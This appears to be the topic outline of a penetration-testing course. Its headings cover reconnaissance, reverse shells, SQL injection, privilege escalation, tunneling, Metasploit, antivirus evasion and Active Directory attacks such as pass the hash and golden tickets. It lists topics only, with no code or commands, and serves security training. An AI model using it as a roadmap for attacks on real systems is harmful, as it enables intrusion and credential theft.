Passive information gathering:
- Taking Notes
- Website Recon
- Open-Source Code
- Shodan
- Security Headers Scanner
- SSL Server Test
- Pastebin
- User Information Gathering
- Social Media Tools
- Stack Overflow
- Information Gathering Frameworks
OSINT Framework
Maltego
Networking tools:
Netcat vs Socat
Socat File Transfers
Socat Reverse Shells
Socat Encrypted Bind Shells
PowerShell File Transfers
PowerShell Reverse Shells
PowerShell Bind Shells
Powercat
Powercat File Transfers
Powercat Reverse Shells
Powercat Bind Shells Powercat Stand-Alone Payloads
Active Information Gathering
Masscan
Web application attacks:
- Introduction to OWASP Top 10
- File inclusion
Local File Inclusion
Remote File Inclusion
- Automated SQL Injection tools
SQL Map
Writing SQL Injection Exploit
Privilege escalation:
Manual Enumeration
Automated Enumeration
- Windows Privilege Escalation Examples
Understanding Windows Privileges and Integrity Levels
Introduction to User Account Control (UAC)
Insecure File Permissions
Leveraging Unquoted Service Paths
- Linux Privilege Escalation Examples
Understanding Linux Privileges
Insecure File Permissions
Insecure File Permissions: /etc/passwd
Kernel Vulnerabilities
Client side attacks:
- Collecting client information
Passive client information gathering
Active client information gathering
Social engineering and client side attacks
Browser based exploits
Browser based exploit tools
Network tunneling and port redirection:
- Port forwarding and redirection
- SSH Tunneling
Local port forwarding
Remote port forwarding
Dynamic port forwarding
- Proxy chains
- HTTP Tunneling
- Traffic encapsulation
File Transfers:
- Considerations and Preparation
Danger of Transferring Attack Tools
Installing Pure-FTPd
The Non-Interactive Shell
- Transferring Files with Windows Hosts
Non Interactive FTP Download
Windows Downloads Using Scripting Languages
Windows Downloads with exec2hex and PowerShel
Windows Uploads Using Windows Scripting Languages
Uploading Files with TFTP
Metasploit framework:
- Post Exploitation with Metasploit
Core Post-Exploitation Features
Migrating Processes
Post-Exploitation Modules
Pivoting with the Metasploit Framework
Metasploit Automation
Antivirus Evasion:
- What is Antivirus Software
- Methods of Detecting Malicious Code
Signature Based Detection
Heuristic and Behavioral Based Detection
- Bypassing Antivirus Detection
On-Disk Evasion
In-Memory Evasion
Practical Example
Active Directory Attacks:
- Active Directory Theory
- Active Directory Enumeration
Traditional Approach
A Modern Approach
Resolving Nested Groups
Currently Logged on Users
Enumeration Through Service Principal Names
- Active Directory Authentication
NTLM Authentication
Kerberos Authentication
Cached Credential Storage and Retrieval
Service Account Attacks Low and Slow Password Guessing
- Active Directory Lateral Movement
Pass the Hash
Overpass the Hash
Pass the Ticket
Distributed Component Object Model
- Active Directory Persistence
Golden Tickets
Domain Controller Synchronization
PowerShell Empire:
- Installation, Setup, and Usage
PowerShell Empire Syntax
Listeners and Stagers
The Empire Agent
Situational Awareness
Credentials and Privilege Escalation
Lateral Movement
- Switching Between Empire and Metasploit
